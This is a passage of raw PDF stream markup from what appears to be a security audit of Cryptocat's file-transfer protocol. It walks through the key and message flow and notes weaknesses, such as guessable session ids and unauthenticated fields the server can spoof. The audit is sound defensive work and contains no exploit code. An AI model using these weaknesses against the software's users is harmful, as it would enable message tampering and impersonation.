rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 87 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 8.44 0 Td (f.) Tj T* -8.44 0 Td ET Q Q q 1 0 0 1 23 27 cm q BT 1 0 0 1 0 62 Tm .944651 Tw 12 TL /F1 10 Tf 0 0 0 rg (The file transmitter initiates a strophe file transfer, which sends the ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (and the file identifier) Tj T* 0 Tw 1.198314 Tw (\(called a "filename" in this protocol\) over an unencrypted and unauthenticated protocol. \(This) Tj T* 0 Tw .64248 Tw (message is unencrypted and unauthenticated at ) Tj /F3 10 Tf (this ) Tj /F1 10 Tf (layer, not at the underlying client) Tj /F6 10 Tf 12 TL (\253) Tj /F1 10 Tf 12 TL (server) Tj T* 0 Tw 1.578651 Tw (transport layer; i.e. 
the server is going to see and have the opportunity to manipulate those) Tj T* 0 Tw 1.296457 Tw (values, and unless both clients use ) Tj /F3 10 Tf (TLS ) Tj /F1 10 Tf (to the server, then other parties will as well.\) In the) Tj T* 0 Tw (same message, the file transmitter client also includes a file size and ) Tj /F3 10 Tf (MIME ) Tj /F1 10 Tf (type.) Tj T* ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 15.36496 Tw 12 TL /F1 10 Tf 0 0 0 rg (\(See ) Tj /F4 10 Tf (Cryptocat.beginSendFile ) Tj /F1 10 Tf (in ) Tj /F4 10 Tf (fileTransfer.js ) Tj /F1 10 Tf (and ) Tj /F4 10 Tf (send ) Tj /F1 10 Tf (in) Tj T* 0 Tw /F4 10 Tf (strophe.si-filetransfer.js) Tj /F1 10 Tf (.\)) Tj T* ET Q Q q Q Q q 1 0 0 1 23 9 cm Q q 1 0 0 1 23 -3 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (g.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (The file transmitter then deletes ) Tj /F4 10 Tf (fileKeys[receiversNick][fileIdentifier]) Tj /F1 10 Tf (.) Tj T* ET Q Q q Q Q q 1 0 0 1 23 -3 cm Q q Q Q q 1 0 0 1 62.69291 609.0236 cm Q q 1 0 0 1 62.69291 129.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 465 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (5.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 453 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .557984 Tw (Now the following events might eventually occur in the intended file-receiver, as caused by some of) Tj T* 0 Tw (the network sends in step 4 \("Whenever a file transfer is initiated"\), above.) Tj T* ET Q Q q 1 0 0 1 23 447 cm Q q 1 0 0 1 23 447 cm Q q 1 0 0 1 23 375 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 57 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (a.) 
Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 62 Tm 1.096905 Tw 12 TL /F1 10 Tf 0 0 0 rg (Whenever the encrypted and authenticated file identifier is received over the ) Tj /F3 10 Tf (OTR ) Tj /F1 10 Tf (protocol in) Tj T* 0 Tw .112927 Tw (the receiver, the ) Tj /F4 10 Tf (OTR ) Tj /F1 10 Tf (object calls back to the ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (code to deliver the file identifier and the) Tj T* 0 Tw .388555 Tw (extra symmetric key. The ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (code in the file receiver diversifies the extra symmetric key) Tj T* 0 Tw 1.03528 Tw (into an encryption key and a ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (key, and stores the pair of keys \(encryption key and ) Tj /F3 10 Tf (MAC) Tj T* 0 Tw .188735 Tw /F1 10 Tf (key\) in the hashtable named ) Tj /F4 10 Tf (fileKeys ) Tj /F1 10 Tf (under the index of the nickname of the file sender and) Tj T* 0 Tw (then under the index of the file identifier: i.e. ) Tj /F4 10 Tf (fileKeys[sendersNick][fileIdentifier]) Tj /F1 10 Tf (.) Tj T* ET Q Q q Q Q q 1 0 0 1 23 369 cm Q q 1 0 0 1 23 -3 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 357 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (b.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 273 cm q BT 1 0 0 1 0 86 Tm .031797 Tw 12 TL /F1 10 Tf 0 0 0 rg (Whenever the unencrypted and unauthenticated strophe file-transfer message is received in the) Tj T* 0 Tw .655318 Tw (file receiver, the message comes with a ) Tj /F4 10 Tf (from ) Tj /F1 10 Tf (field containing the nickname of the sender, as) Tj T* 0 Tw 1.063984 Tw (supplied by the server. The file receiver takes these five fields: from, sid, file identifier \(called) Tj T* 0 Tw 2.626651 Tw ("filename" in the protocol and in the source\), size, and mime-type, and stores them in a) Tj T* 0 Tw 2.020888 Tw (hashtable named ) Tj /F4 10 Tf (rcvFile ) Tj /F1 10 Tf (in ) Tj /F4 10 Tf (fileTransfer.js) Tj /F1 10 Tf (. 
They are indexed in ) Tj /F4 10 Tf (rcvFile ) Tj /F1 10 Tf (first by) Tj T* 0 Tw .049147 Tw /F4 10 Tf (from ) Tj /F1 10 Tf (and then by ) Tj /F4 10 Tf (sid) Tj /F1 10 Tf (. The strophe implementation sends back an acknowledgement message) Tj T* 0 Tw 1.065697 Tw (\(a "noop" in the strophe protocol\) to indicate to the sender that the ) Tj /F3 10 Tf (IBB ) Tj /F1 10 Tf (\(In-Band-Bytestream\)) Tj T* 0 Tw (protocol is supported.) Tj T* ET Q Q q 1 0 0 1 23 267 cm Q q 1 0 0 1 23 267 cm Q q 1 0 0 1 23 111 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 141 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (a.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 146 Tm .044985 Tw 12 TL /F1 10 Tf 0 0 0 rg (N.B. The file transmitter can choose to send anything it likes for sid, file identifier, size, and) Tj T* 0 Tw 2.078651 Tw (mime type. The file transmitter ) Tj /F3 10 Tf (could ) Tj /F1 10 Tf (choose an sid that matches an ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (used by a) Tj T* 0 Tw .83686 Tw (different peer of the file receiver client, or that matches an ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (used by the file receiver) Tj T* 0 Tw 1.343516 Tw (client, if it chose. \(The ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (could be learned by other peers or by the server, or could) Tj T* 0 Tw .531647 Tw (even be guessed "blind" if necessary since they have only approximately 10,000 possible) Tj T* 0 Tw .876905 Tw (values and are generated by ) Tj /F4 10 Tf (Math.random) Tj /F1 10 Tf (.\) The file transmitter ) Tj /F3 10 Tf (could not ) Tj /F1 10 Tf (choose a file) Tj T* 0 Tw .25311 Tw (identifier that matches a file identifier used by a different peer of the file receiver client \(file) Tj T* 0 Tw 3.044524 Tw (identifiers are too large to be guessed and are generated with cryptographic-quality) Tj T* 0 Tw .269982 Tw (randomness\). 
The file transmitter ) Tj /F3 10 Tf (could ) Tj /F1 10 Tf (choose a file identifier that matches a file identifier) Tj T* 0 Tw .869213 Tw (used by itself previously or concurrently. The file transmitter ) Tj /F3 10 Tf (could ) Tj /F1 10 Tf (choose a file identifier) Tj T* 0 Tw 2.552126 Tw (used by the file receiver client in a previous or concurrent file-) Tj /F3 10 Tf (send ) Tj /F1 10 Tf (operation in the) Tj T* 0 Tw .966412 Tw (opposite direction \227 from the client currently operating as file receiver, if it previously or) Tj T* 0 Tw (concurrently sent a file.) Tj T* ET Q Q q Q Q q 1 0 0 1 23 105 cm Q q 1 0 0 1 23 -3 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 93 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (b.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 98 Tm 1.465366 Tw 12 TL /F1 10 Tf 0 0 0 rg (N.B. The server can choose anything that the file transmitter could choose \(from 5.b.a.) Tj T* 0 Tw 1.448314 Tw (above\). \(There is no end-to-end encryption or authentication to prevent the server from) Tj T* 0 Tw 1.232651 Tw (seeing and altering these values as it likes.\) In addition, the server can send the ) Tj /F4 10 Tf (from) Tj T* 0 Tw 1.399983 Tw /F1 10 Tf (field set to whatever it likes \(there is not, at this point, any cryptographic authentication) Tj T* 0 Tw .009984 Tw (showing that the controller of a certain nick sent these fields\). In addition, the server knows) Tj T* 0 Tw .64881 Tw (the exact ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (used by each client and could send a ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (chosen to match any of them.) Tj T* 0 Tw .455984 Tw (In addition, the server knows the file identifiers used by all clients \(since the file identifiers) Tj T* 0 Tw 1.437126 Tw (are sent unencrypted in the strophe protocol, in addition to being sent encrypted in the) Tj T* 0 Tw /F3 10 Tf (OTR ) Tj /F1 10 Tf (protocol\), so it could choose to send a file identifier equal to any of them.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 23 -3 cm Q q Q Q q 1 0 0 1 23 -3 cm Q q Q Q q 1 0 0 1 62.69291 123.0236 cm Q q 1 0 0 1 62.69291 93.02362 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 15 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (6.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .17561 Tw (Now the following event might eventually occur in the file transmitter, as caused by the network send) Tj T* 0 Tw (from the receiver's strophe implementation in 5.b:) Tj T* ET Q Q q 1 0 0 1 23 -3 cm Q q 1 0 0 1 23 -3 cm Q q Q Q endstream endobj % 'R200': class PDFStream 200 0 obj % page stream << /Length 10319 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 639.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 6 113 Tm T* ET q 1 0 0 1 23 -3 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 111 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (a.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 75 cm q BT 1 0 0 1 0 38 Tm .439979 Tw 12 TL /F1 10 Tf 0 0 0 rg (Whenever the strophe acknowledgement message from the file receiver arrives \(indicating that) Tj T* 0 Tw 1.177318 Tw (the receiver is capable of ) Tj /F3 10 Tf (IBB) Tj /F1 10 Tf (\), then the file transmitter sends an ) Tj /F3 10 Tf (IBB ) Tj /F1 10 Tf ('open' message, which) Tj T* 0 Tw 2.32748 Tw (contains the receiver's nickname, the sid, and the chunksize. This message is transmitted) Tj T* 0 Tw (unencrypted and unauthenticated.) Tj T* ET Q Q q 1 0 0 1 23 69 cm Q q 1 0 0 1 23 69 cm Q q 1 0 0 1 23 57 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (a.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (N.B. the file transmitter can choose anything it likes to send for the sid and the chunksize.) Tj T* ET Q Q q Q Q q 1 0 0 1 23 51 cm Q q 1 0 0 1 23 15 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (b.) 
Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.935366 Tw (N.B. the server can choose anything that the file transmitter could choose \(from 6.a.a) Tj T* 0 Tw 2.611984 Tw (above\). In addition, the server can send the "from" field set to whatever it likes. As) Tj T* 0 Tw (mentioned above, the server also knows the sids of all clients.) Tj T* ET Q Q q Q Q q 1 0 0 1 23 15 cm Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (\(See ) Tj /F4 10 Tf (Cryptocat.beginSendFile ) Tj /F1 10 Tf (in ) Tj /F4 10 Tf (fileTransfer.js) Tj /F1 10 Tf (.\)) Tj T* ET Q Q q Q Q q 1 0 0 1 23 -3 cm Q q Q Q q 1 0 0 1 62.69291 633.0236 cm Q q 1 0 0 1 62.69291 483.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 135 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (7.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 123 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .904985 Tw (Now the following event might eventually occur in the file receiver, as caused by the network send) Tj T* 0 Tw (from the file transmitter's 6.a.:) Tj T* ET Q Q q 1 0 0 1 23 117 cm Q q 1 0 0 1 23 117 cm Q q 1 0 0 1 23 -3 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 105 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (a.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 45 cm q BT 1 0 0 1 0 62 Tm .578651 Tw 12 TL /F1 10 Tf 0 0 0 rg (Whenever an ) Tj /F3 10 Tf (IBB ) Tj /F1 10 Tf ('open' message is received, the client uses the ) Tj /F4 10 Tf (from ) Tj /F1 10 Tf (and ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (values from) Tj T* 0 Tw 8.553615 Tw (the message to retrieve the file identifier from the ) Tj /F4 10 Tf (rcvFile ) Tj /F1 10 Tf (hashtable, i.e.) Tj T* 0 Tw .458863 Tw /F4 10 Tf (fileIdentifier) Tj ( ) Tj (= rcvFile[from][sid].filename) Tj /F1 10 Tf (, and then fetches the keys from the) Tj T* 0 Tw .099974 Tw /F4 10 Tf (fileKeys ) Tj /F1 10 Tf (hashtable, i.e. 
) Tj /F4 10 Tf (key) Tj ( ) Tj (= fileKeys[from][fileIdentifier]) Tj /F1 10 Tf (, and then stores the) Tj T* 0 Tw 1.160888 Tw (keys in the ) Tj /F4 10 Tf (rcvFile ) Tj /F1 10 Tf (hashtable, i.e. ) Tj /F4 10 Tf (rcvFile[from][sid].key) Tj ( ) Tj (=) Tj ( ) Tj (key) Tj /F1 10 Tf (, and then deletes) Tj T* 0 Tw (the key from the ) Tj /F4 10 Tf (fileKeys ) Tj /F1 10 Tf (hashtable, i.e. ) Tj /F4 10 Tf (delete) Tj ( ) Tj (fileKeys[from][fileIdentifier]) Tj /F1 10 Tf (.) Tj T* ET Q Q q 1 0 0 1 23 27 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (The file receiver client then sends an ) Tj /F3 10 Tf (IBB ) Tj /F1 10 Tf ("result" message back to the file transmitter.) Tj T* ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 5.209974 Tw 12 TL /F1 10 Tf 0 0 0 rg (\(See case 'open' in ) Tj /F4 10 Tf (Cryptocat.ibbHandler ) Tj /F1 10 Tf (in ) Tj /F4 10 Tf (fileTransfer.js ) Tj /F1 10 Tf (and ) Tj /F4 10 Tf (open ) Tj /F1 10 Tf (in) Tj T* 0 Tw /F4 10 Tf (strophe.ibb.js) Tj /F1 10 Tf (.\)) Tj T* ET Q Q q Q Q q 1 0 0 1 23 -3 cm Q q Q Q q 1 0 0 1 62.69291 477.0236 cm Q q 1 0 0 1 62.69291 76.86614 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 385.1575 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (8.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 373.1575 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .17561 Tw (Now the following event might eventually occur in the file transmitter, as caused by the network send) Tj T* 0 Tw (from the file receiver's 7.a., or as caused by the network send from the file receiver's 9.a.:) Tj T* ET Q Q q 1 0 0 1 23 367.1575 cm Q q 1 0 0 1 23 367.1575 cm Q q 1 0 0 1 23 319.1575 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 33 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (a.) 
Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 38 Tm 2.902126 Tw 12 TL /F1 10 Tf 0 0 0 rg (Whenever an ) Tj /F3 10 Tf (IBB ) Tj /F1 10 Tf ("result" message is received in reply to the ) Tj /F3 10 Tf (IBB ) Tj /F1 10 Tf ("open" message, the) Tj T* 0 Tw 1.808294 Tw (file-transmitter client executes ) Tj /F4 10 Tf (Cryptocat.sendFileData ) Tj /F1 10 Tf (\(from ) Tj /F4 10 Tf (fileTransfer.js) Tj /F1 10 Tf (\) with) Tj T* 0 Tw .576457 Tw (its ) Tj /F4 10 Tf (to ) Tj /F1 10 Tf (argument set to the intended receiver's nick, and its ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (argument set to the sid. \(See) Tj T* 0 Tw /F4 10 Tf (Cryptocat.beginSendFile ) Tj /F1 10 Tf (in ) Tj /F4 10 Tf (fileTransfer.js) Tj /F1 10 Tf (.\)) Tj T* ET Q Q q Q Q q 1 0 0 1 23 313.1575 cm Q q 1 0 0 1 23 -4.84252 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 303 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (b.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 279 cm q BT 1 0 0 1 0 26 Tm 1.239979 Tw 12 TL /F1 10 Tf 0 0 0 rg (Whenever the file transmitter's ) Tj /F4 10 Tf (sendFileData ) Tj /F1 10 Tf (method is invoked, the file transmitter looks) Tj T* 0 Tw .204597 Tw (up the file-being-sent's position, filehandle, counter, and encryption key, and total size from the) Tj T* 0 Tw /F4 10 Tf (files ) Tj /F1 10 Tf (hashtable in the ) Tj /F4 10 Tf (fileTransfer.js) Tj /F1 10 Tf (, under the index of the ) Tj /F4 10 Tf (sid) Tj /F1 10 Tf (.) 
Tj T* ET Q Q q 1 0 0 1 23 213 cm q BT 1 0 0 1 0 50 Tm .407045 Tw 12 TL /F1 10 Tf 0 0 0 rg (The file transmitter then computes the bounds of the next chunk of the file \(where a "chunk" is) Tj T* 0 Tw .717209 Tw (64,511 bytes long, or shorter if there are not that many bytes left in the file\), starting from the) Tj T* 0 Tw 1.844983 Tw (current "position", sets the position \(on the object in the ) Tj /F4 10 Tf (files ) Tj /F1 10 Tf (hashtable under the ) Tj /F4 10 Tf (sid) Tj T* 0 Tw .104104 Tw /F1 10 Tf (index\) to the index number of the next byte after the chunk, and increments the counter \(on the) Tj T* 0 Tw (object in the ) Tj /F4 10 Tf (files ) Tj /F1 10 Tf (hashtable under the ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (index\).) Tj T* ET Q Q q 1 0 0 1 23 171 cm q BT 1 0 0 1 0 26 Tm .00936 Tw 12 TL /F1 10 Tf 0 0 0 rg (The file transmitter then reads the chunk from disk, and when the chunk is loaded into memory,) Tj T* 0 Tw .461235 Tw (it encrypts it with ) Tj /F3 10 Tf (AES-256 ) Tj /F1 10 Tf (in ) Tj /F3 10 Tf (CTR ) Tj /F1 10 Tf (mode using the encryption key and counter from the object) Tj T* 0 Tw (stored under the ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (index in the ) Tj /F4 10 Tf (files ) Tj /F1 10 Tf (hashtable.) Tj T* ET Q Q q 1 0 0 1 23 129 cm q BT 1 0 0 1 0 26 Tm .387485 Tw 12 TL /F1 10 Tf 0 0 0 rg (It then generates a header consisting of the counter value and the total number of chunks and) Tj T* 0 Tw 1.751318 Tw (computes a ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (over that header plus the ciphertext chunk, using the ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (key from the) Tj T* 0 Tw (object stored under the ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (index in the ) Tj /F4 10 Tf (files ) Tj /F1 10 Tf (hashtable.) 
Tj T* ET Q Q q 1 0 0 1 23 87 cm q BT 1 0 0 1 0 26 Tm .95186 Tw 12 TL /F1 10 Tf 0 0 0 rg (It then appends the ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (tag to the ciphertext chunk and sends an ) Tj /F3 10 Tf (IBB ) Tj /F1 10 Tf ("data" message with) Tj T* 0 Tw 1.804269 Tw (the data consisting of ciphertext chunk followed by the ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (tag. The ) Tj /F3 10 Tf (IBB ) Tj /F1 10 Tf ("data" message) Tj T* 0 Tw (includes, in addition to the data, a ) Tj /F4 10 Tf (from ) Tj /F1 10 Tf (and ) Tj /F4 10 Tf (sid) Tj /F1 10 Tf (.) Tj T* ET Q Q q 1 0 0 1 23 81 cm Q q 1 0 0 1 23 81 cm Q q 1 0 0 1 23 69 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (a.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (N.B. the file transmitter can choose anything it likes to send for the ) Tj /F4 10 Tf (sid) Tj /F1 10 Tf (.) Tj T* ET Q Q q Q Q q 1 0 0 1 23 69 cm Q q 1 0 0 1 23 63 cm Q q 1 0 0 1 23 63 cm Q q 1 0 0 1 23 27 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (a.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.704597 Tw (N.B. the server can choose anything that the file transmitter could choose \(from 8.b.a) Tj T* 0 Tw 2.411984 Tw (above\). In addition, the server can send the "from" field set to whatever it likes. As) Tj T* 0 Tw (mentioned above, the server also knows the sids of all clients.) Tj T* ET Q Q q Q Q q 1 0 0 1 23 27 cm Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm .870651 Tw 12 TL /F1 10 Tf 0 0 0 rg (When/if the file transmitter receives an ) Tj /F3 10 Tf (IBB ) Tj /F1 10 Tf ("result" message in response to this send, then it) Tj T* 0 Tw (invokes its ) Tj /F4 10 Tf (sendFileData ) Tj /F1 10 Tf (method again.) 
Tj T* ET Q Q q Q Q q Q Q endstream endobj % 'R201': class PDFStream 201 0 obj % page stream << /Length 3621 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 753.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 6 -1 Tm T* ET q 1 0 0 1 23 -3 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 6 -1 Tm T* ET q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (\(See ) Tj /F4 10 Tf (Cryptocat.sendFileData ) Tj /F1 10 Tf (from ) Tj /F4 10 Tf (fileTransfer.js) Tj /F1 10 Tf (.\)) Tj T* ET Q Q q Q Q q 1 0 0 1 23 -3 cm Q q Q Q q 1 0 0 1 62.69291 747.0236 cm Q q 1 0 0 1 62.69291 525.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 207 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (9.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 195 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .904985 Tw (Now the following event might eventually occur in the file receiver, as caused by the network send) Tj T* 0 Tw (from the file-transmitter's 8.b.:) Tj T* ET Q Q q 1 0 0 1 23 189 cm Q q 1 0 0 1 23 189 cm Q q 1 0 0 1 23 -3 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 177 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (a.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 153 cm q BT 1 0 0 1 0 26 Tm .763984 Tw 12 TL /F1 10 Tf 0 0 0 rg (Whenever an ) Tj /F3 10 Tf (IBB ) Tj /F1 10 Tf ('data' message is received, the client uses the ) Tj /F4 10 Tf (from ) Tj /F1 10 Tf (and ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (values from) Tj T* 0 Tw .979318 Tw (the message to look up the object in the ) Tj /F4 10 Tf (rcvFile ) Tj /F1 10 Tf (hashtable indexed under the ) Tj /F4 10 Tf (from ) Tj /F1 10 Tf (and) Tj T* 0 Tw (then the ) Tj /F4 10 Tf (sid) Tj /F1 10 Tf (.) Tj T* ET Q Q q 1 0 0 1 23 135 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (From that object it reads an ) Tj /F4 10 Tf (abort ) Tj /F1 10 Tf (flag, and if that flag is set it returns.) 
Tj T* ET Q Q q 1 0 0 1 23 57 cm q BT 1 0 0 1 0 62 Tm 1.950651 Tw 12 TL /F1 10 Tf 0 0 0 rg (Next, from that object it reads the encryption and ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (keys, counter, and total number of) Tj T* 0 Tw 1.174983 Tw (blocks. It generates a header containing the counter and total number of blocks, computes a) Tj T* 0 Tw 2.113516 Tw /F3 10 Tf (MAC ) Tj /F1 10 Tf (on that header using the ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (key, parses out the ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (tag from the data from the) Tj T* 0 Tw .85561 Tw (message, and compares its generated ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (tag to the one from the message. If they differ, it) Tj T* 0 Tw .862651 Tw (sets the ) Tj /F4 10 Tf (abort ) Tj /F1 10 Tf (flag on the object indexed under ) Tj /F4 10 Tf (from ) Tj /F1 10 Tf (and ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (in the ) Tj /F4 10 Tf (rcvFile ) Tj /F1 10 Tf (hashtable) Tj T* 0 Tw (and returns.) Tj T* ET Q Q q 1 0 0 1 23 15 cm q BT 1 0 0 1 0 26 Tm .181751 Tw 12 TL /F1 10 Tf 0 0 0 rg (Next, it decrypts the chunk using the key and counter. It appends the plaintext chunk data to an) Tj T* 0 Tw 3.018651 Tw (attribute named ) Tj /F4 10 Tf (data ) Tj /F1 10 Tf (of the object which is indexed under the ) Tj /F4 10 Tf (from ) Tj /F1 10 Tf (and ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (in the) Tj T* 0 Tw /F4 10 Tf (rcvFile ) Tj /F1 10 Tf (hashtable, and increments the counter in that object.) 
Tj T* ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (\(See the 'data' case in ) Tj /F4 10 Tf (Cryptocat.ibbHandler ) Tj /F1 10 Tf (in ) Tj /F4 10 Tf (fileTransfer.js) Tj /F1 10 Tf (.\)) Tj T* ET Q Q q Q Q q 1 0 0 1 23 -3 cm Q q Q Q q 1 0 0 1 62.69291 525.0236 cm Q q 1 0 0 1 62.69291 525.0236 cm Q endstream endobj % 'R202': class PDFStream 202 0 obj % page stream << /Length 10076 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 744.0236 cm q BT 1 0 0 1 0 3.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Appendix B: Work Log) Tj T* ET Q Q q 1 0 0 1 62.69291 714.0236 cm q BT 1 0 0 1 0 14 Tm 1.757318 Tw 12 TL /F1 10 Tf 0 0 0 rg (We checked the Chrome store archive against the git tag and discovered a discrepancy. We created) Tj T* 0 Tw 0 0 .501961 rg (Issue 500 ) Tj 0 0 0 rg (to highlight this issue.) Tj T* ET Q Q q 1 0 0 1 62.69291 708.0236 cm Q q 1 0 0 1 62.69291 708.0236 cm Q q 1 0 0 1 62.69291 660.0236 cm 0 0 0 rg BT /F1 10 Tf 12 